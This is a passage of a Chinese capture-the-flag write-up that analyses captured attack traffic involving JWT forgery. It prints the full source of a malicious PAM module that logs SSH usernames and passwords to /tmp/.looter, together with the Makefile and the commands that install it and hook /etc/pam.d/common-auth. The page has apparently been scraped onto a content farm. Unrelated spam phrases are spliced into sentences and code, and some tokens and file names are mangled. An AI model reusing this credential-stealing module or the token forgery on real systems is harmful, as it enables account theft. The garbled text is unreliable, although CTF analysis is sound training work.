一千万的英文翻译英语怎么说-陈佩娜
2023年4月5日发(作者:rescue是什么意思)
全⽹最新最全⾸届“陇剑杯”⽹络安全⼤赛完整WIRTEUP---jwt(6题)
题⽬描述
昨天,单位小学一年级语文上册古诗 流量系统捕获了⿊客攻击流量,请您分析流量后进⾏回答:
2.1 该⽹站使⽤了______认证⽅式。(如有字母请全部使⽤⼩写)
wp:
jwt是什么?参考连接/gaohuayan/p/
jw经典阅读文章100篇 t就是JSONWebToken(缩写JWT)是⽬前最流⾏的跨域认证解决⽅案,通俗来说就是让多个服务器知道你是谁,⽽⽆需重复登录。jwt保存在cookie中,格式是
头中保存的是jwt格式,载荷中保存的是内容,签名部分保存的是前⾯内容的哈希值防⽌篡改
wireshakk打开包,
7号数据包是post⽅式提交form表单认证,8号数据包表⽰认证通过同时返回jwt数据和⽹页,jwt数据可以简单理解为cookie。
flag:
因此该⽹站使⽤的jwt认证⽅式,这⾥有个坑,我开始以为是form表单认证,这⾥问题描述还是不够清晰。
2.2 ⿊客绕过验证使⽤的jwt中,id和username是______。(中间使⽤#号隔开,例如1#admin)
wp:
在8号数据包中,我们在cookie中的token中提取jwt数据
token=I6MTAwODYsXjas3_Cg9a3tr8COXF7DRsuX8UjmbC1nKf8
分为三段
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
eyJpZCI6MTAwODYsIk1hcENsYWltcyI6eyJhdWQiOiJhZG1pbiIsInVzZXJuYW1lIjoiYWRtaW4ifX0
dJArtwXjas3_Cg9a3tr8COXF7DRsuX8UjmbC1nKf8fc一衣带水是什么意思
⽤base64解码第⼆段得到
{\"id\":10086,\"春节手抄报内容短文 MapClaims\":{\"aud\":\"admin\",\"username\":\"admin\"}}
flag:
因此10086#admin
我提交后发现不对,我们再次审题⿊客绕过验证使⽤的jwt中,重点是⿊客绕过验证,分析数据包,这个jwt是⿊客使⽤弱密码admin表单登录后发送给⿊客的第⼀个令牌,并没有
体现绕过⼆字。之后在27号⿊客使⽤该令牌执⾏了系统命令whoami,系统返回了alert(\"Theadministratorhastheauthoritytodothis,youcan’t\")n,意思是只有管理员才有权
⼒执⾏该命令,你不能执⾏。⿊客此时明⽩了它并不是最⾼权限,有再次登录获取新的jwt,还是不⾏。在97号数据包中,⿊客⾸次构造了jwt,构造结果如下
token=I6MTAwODYsXjas3_Cg9a3tr8COXF7DRsuX8UjmbC1nKf8
Path=/;Max-Age=3600;HttpOnly
解密后得知,
{\"id\":10087,\"MapClaims\":{\"username\":\"admin\"}}
这个才是伪造的,之前是系统⾃动⽣成的。
flag:
因此10087#admin
2.3 ⿊客获取webshell之后,权限是______?
wp:
在97号数据包中⿊客使⽤伪造的jwt提交了whoami,98号包返回root。这⾥⿊客利⽤了jwt伪造漏洞和命令执⾏漏洞
flag:
root
2.4 ⿊客上传的恶意⽂件⽂件名是_____________。(请提交带有⽂件后缀的⽂件名,例如)
wp:
因为⼀个⼀个查看⿊客执⾏的代码⽐较⿇烦,我们导出http对象同意分析⽂件。再103号数据包中,⽤base64解码后都到,将下⾯1.c写道/tmp/⽬录下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include
#include
#include
#include
#include
#includ以铜为镜可以正衣冠
e
#include
size_twrite_data(void*buffer,size_tsize,size_tnmemb,void*userp)
{
returnsize*nmemb;
}
voidsaveMessage(char(*message)[]){
FILE*fp=NULL;
fp=fopen(\"/tmp/.looter\",\"a+\");
fputs(*message,fp);
fclose(fp);
}
PAM_EXTERNintpam_sm_setcred(pam_handle_t*pamh,intflags,intargc,constchar**argv){
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
returnPAM_SUCCESS;
}
PAM_EXTERNintpam_sm_acct_mgmt(pam_handle_t*pamh,intflags,intargc,constchar**argv){
returnPAM_SUCCESS;
}
PAM_EXTERNintpam_sm_authenticate(pam_handle_t*pamh,intflags,intargc,constchar**argv){
intretval;
constchar*username;
constchar*password;
charmessage[1024];
retval=pam_get_user(pamh,&username,\"Username描写深秋的诗句古诗 :\");
pam_get_item(pamh,PAM_AUTHTOK,(void*)&password);
if(retval!=PAM_SUCCESS){
returnretval;
}
snprintf(message,2048,\"Username%snPassword:%sn\",username,password);
saveMessage(&message);
returnPAM_SUCCESS;
}
flag:
1.c
2.5 ⿊客在服务器上编译的恶意so⽂件,⽂1 6年级一等奖爱国手抄报 件名是_____________。(请提交带有⽂件后缀的⽂件名,例如)
wp:
109号数据包中⼜写了/tmp/Makefile
1
2
3
4
CFLAGS+=-Werror-Wall
:looter.c
gcc$(CFLAGS)-fPIC-shared-Xlinker-x-o$@$<-lcurl
然后再/tm⽬录下执⾏make命令,将looter.c编译成
flag:
因此是
2.6 ⿊客在服务器上修改了⼀个配置⽂件,⽂件的绝对路径为_____________。(请确认绝对路径后再提交)
wp:
之后⿊客发现源代码⽂件名称不对不是1.c,重命名源代码⽂件名称,mv/tmp/1.c/tmp/loote立春祝福短句 r.c,这⾥是作者故意埋下的坑,让2.4的问题变得模糊,让我们以为上传的⽂件是
looter.c
再次make,此时/tmp下有三个⽂件Makefile looter.c ,编译好的⽊马是
cp/tmp//lib/x86_64-linux-gnu/security/,移动⽊马到ssh认证⽬录下
echo\"\">>/etc/pam.d/common-auth,这棉的拼音 ⾥修改了ssh配置⽂件
flag:
etc/pam.d/common-auth
之后⿊客执⾏了
servicesshrestart
cat/tmp/.looter
1
UsernamerootnPassword:flag{test_flag}nUsernamerootnPassword:flag{test_flag}nUsernamerootnPassword:flag{test_flag}nUsernamerootnPassword:flag{test_flag}nUsernamerootnPassword:
flag{test_flag}n
因此⿊客上传的是ssh登录凭证记录⽊马
更多推荐
looter是什么意思ter在线翻译读音例句
发布评论